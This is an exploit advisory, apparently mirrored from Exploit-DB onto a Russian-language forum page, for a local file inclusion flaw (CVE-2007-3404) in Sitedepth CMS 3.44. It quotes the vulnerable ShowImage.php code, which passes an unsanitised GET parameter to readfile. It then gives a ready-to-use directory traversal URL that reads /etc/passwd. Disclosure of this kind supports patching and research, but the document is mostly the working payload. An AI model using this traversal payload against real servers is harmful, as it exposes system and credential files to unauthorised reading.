- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4105
- Проверка EDB
-
- Пройдено
- Автор
- H4 / XPK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3404
- Дата публикации
- 2007-06-25
Код:
__________________________________________________________________________
[*] Sitedepth CMS 3.44 Local File Include LFI Exploit
__________________________________________________________________________
[!] Application homepage : http://www.sitedepth.com/
[!] Author : H4 / Team XPK
[!] Contact : [email protected]
[!] Bug discovered : 2006-11-07
[!] Bug published : 2007-06-25
---------------------------------------------------------------------
Vuln. code: ShowImage.php
<?php
include 'sitedepth.php';
$content_type = 'image/jpeg';
$filename = SD_DIRS_REPOS . '/html/' . $_GET['name'];
$filename_show = $_GET['name'];
header ('Content-type: ' . $content_type);
header ('Content-Disposition: inline; filename=' . $filename_show);
readfile ($filename); <-------------- BAD!
?>
---------------------------------------------------------------------
[!] Exploitation : http://noobie.com/sitedepth/ShowImage.php?name=../../../../../../../../etc/passwd
---------------------------------------------------------------------
[!] Sometimes it`s time to give instead of taking :)
[!] Greetz to Angeldust & Streets and to rest of community.
# milw0rm.com [2007-06-25]- Источник
- www.exploit-db.com
